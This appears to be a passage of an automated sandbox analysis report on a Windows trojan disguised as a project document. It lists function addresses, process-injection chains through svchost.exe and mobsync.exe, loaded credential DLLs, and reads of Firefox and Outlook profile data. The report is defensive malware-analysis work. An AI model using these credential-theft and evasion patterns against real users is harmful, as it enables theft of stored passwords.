                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CBB2A2_2_033CBB2A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CBB172_2_033CBB17
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D419A2_2_033D419A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CD9FA2_2_033CD9FA
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CD7DA2_2_033CD7DA
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033EC68A2_2_033EC68A
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D5EF62_2_033D5EF6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECE4F63_2_04ECE4F6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED24463_2_04ED2446
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC44203_2_04EC4420
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE05913_2_04EE0591
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E205353_2_04E20535
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3C6E03_2_04E3C6E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1C7C03_2_04E1C7C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E207703_2_04E20770
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E447503_2_04E44750
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EB20003_2_04EB2000
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED81CC3_2_04ED81CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE01AA3_2_04EE01AA
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED41A23_2_04ED41A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EA81583_2_04EA8158
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E101003_2_04E10100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBA1183_2_04EBA118
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EA02C03_2_04EA02C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC02743_2_04EC0274
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE03E63_2_04EE03E6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2E3F03_2_04E2E3F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDA3523_2_04EDA352
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E10CF23_2_04E10CF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC0CB53_2_04EC0CB5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E20C003_2_04E20C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1ADE03_2_04E1ADE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E38DBF3_2_04E38DBF
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2AD003_2_04E2AD00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBCD1F3_2_04EBCD1F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDEEDB3_2_04EDEEDB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E32E903_2_04E32E90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDCE933_2_04EDCE93
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E20E593_2_04E20E59
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDEE263_2_04EDEE26
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E12FC83_2_04E12FC8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E9EFA03_2_04E9EFA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E94F403_2_04E94F40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E62F283_2_04E62F28
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E40F303_2_04E40F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC2F303_2_04EC2F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E4E8F03_2_04E4E8F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E068B83_2_04E068B8
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E228403_2_04E22840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2A8403_2_04E2A840
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E229A03_2_04E229A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EEA9A63_2_04EEA9A6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E369623_2_04E36962
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E1EA803_2_04E1EA80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED6BD73_2_04ED6BD7
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDAB403_2_04EDAB40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E114603_2_04E11460
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF43F3_2_04EDF43F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EE95C33_2_04EE95C3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBD5B03_2_04EBD5B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED75713_2_04ED7571
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED16CC3_2_04ED16CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E656303_2_04E65630
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF7B03_2_04EDF7B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED70E93_2_04ED70E9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDF0E03_2_04EDF0E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECF0CC3_2_04ECF0CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E270C03_2_04E270C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E2B1B03_2_04E2B1B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EEB16B3_2_04EEB16B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E5516C3_2_04E5516C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E0F1723_2_04E0F172
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC12ED3_2_04EC12ED
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3D2F03_2_04E3D2F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3B2C03_2_04E3B2C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E252A03_2_04E252A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E6739A3_2_04E6739A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E0D34C3_2_04E0D34C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED132D3_2_04ED132D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFCF23_2_04EDFCF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E99C323_2_04E99C32
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3FDC03_2_04E3FDC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED7D733_2_04ED7D73
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E23D403_2_04E23D40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED1D5A3_2_04ED1D5A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E29EB03_2_04E29EB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE3FD53_2_04DE3FD5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE3FD23_2_04DE3FD2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFFB13_2_04EDFFB1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E21F923_2_04E21F92
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFF093_2_04EDFF09
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E238E03_2_04E238E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E8D8003_2_04E8D800
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E299503_2_04E29950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3B9503_2_04E3B950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EB59103_2_04EB5910
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ECDAC63_2_04ECDAC6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E65AA03_2_04E65AA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EBDAAC3_2_04EBDAAC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EC1AA33_2_04EC1AA3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E93A6C3_2_04E93A6C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFA493_2_04EDFA49
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04ED7A463_2_04ED7A46
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E95BF03_2_04E95BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E5DBF93_2_04E5DBF9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E3FB803_2_04E3FB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04EDFB763_2_04EDFB76
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E91CB03_2_02E91CB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8CB803_2_02E8CB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AEC43_2_02E8AEC4
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AED03_2_02E8AED0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8CDA03_2_02E8CDA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E8AD803_2_02E8AD80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E953403_2_02E95340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E935403_2_02E93540
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EABA303_2_02EABA30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E50B3_2_04C7E50B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E7413_2_04C7E741
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E2883_2_04C7E288
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7E3A33_2_04C7E3A3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C8533C3_2_04C8533C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7D8083_2_04C7D808
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04C7CA983_2_04C7CA98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007C7DE1 appears 35 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007E0AE3 appears 70 times
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: String function: 007E8900 appears 42 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E0B970 appears 262 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E8EA12 appears 86 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E55130 appears 58 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E9F290 appears 103 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04E67E54 appears 107 times
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667492083.00000000038BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YH-3-12-2024-GDL Units - Projects.exe
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666420188.0000000003713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YH-3-12-2024-GDL Units - Projects.exe
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/10
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082A06A GetLastError,FormatMessageW,0_2_0082A06A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008181CB AdjustTokenPrivileges,CloseHandle,0_2_008181CB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008187E1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0082B3FB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0083EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0083EE0D
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0082C397
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007C4E89
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeFile created: C:\Users\user\AppData\Local\Temp\aut12E8.tmpJump to behavior
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003262000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.2049691866.0000000003262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YH-3-12-2024-GDL Units - Projects.exeReversingLabs: Detection: 31%
                Source: YH-3-12-2024-GDL Units - Projects.exeVirustotal: Detection: 33%
                Source: unknownProcess created: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"Jump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic file information: File size 1213952 > 1048576
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zZyhwwvEVl.exe, 00000002.00000000.1787718772.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3502520360.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
